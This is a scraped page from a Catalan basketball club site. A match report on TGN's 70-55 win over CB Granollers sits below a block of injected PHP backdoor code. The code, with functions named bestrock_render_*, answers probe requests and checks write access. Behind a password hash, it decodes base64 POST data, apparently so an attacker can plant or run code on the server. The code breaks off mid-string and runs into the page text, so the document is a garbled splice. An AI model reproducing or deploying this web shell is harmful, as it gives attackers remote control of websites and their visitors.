function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria d'equip amb majúscules pel TGN! (70-55) - Tgn Bàsquet Club -

Victòria d’equip amb majúscules pel TGN! (70-55)

Updated: novembre 25, 2023

Partit corresponent a la desena jornada de la nova competició de la FCBQ Supercopa Catalunya femenina, on el Sènior A rebia la visita del CB Granollers , equip que es trobava amb el mateix balanç que les liles (4 victòries i 5 derrotes).

El partit va començar amb un TGN endolladíssim, aconseguint colpejar primer i situant-se amb un marcador favorable de 8-2 al minut 4 de partit. Aquesta seria la tònica general del partit: un TGN superior en gairebé totes les facetes del joc i un Granollers a remolc del conjunt dirigit per Israel Esteve. Al final dels primers 10 minuts, el marcador reflexava un 18-8 favorable per les liles.

Al segon periode, les visitants haun augmentat les prestacions defensives gràcies a una pressió alta que ha fet dubtar a les liles (27-22 al minut 17), però el marcador s’ha mantingut favorable a les locals, que han marxat al descans amb un 36-24.

La segona part ha seguit la tònica de la primera, però encara més accentuat. Un parcial de 13-1 al final del tercer quart ha acabat de sentenciar el matx per les liles, que han aixecat el peu de l’accelerador a l’últim quart i el resultat final ha sigut de 70-55. Espectacular l’actuació de la MVP del partit, Sara Torruella, amb 15 punts i 5 rebots (21 de valoració)

A la propera jornada, el TGN visitarà la pisat del Cerdanyola CBF el dissabte 2 de desembre a les 17:45h.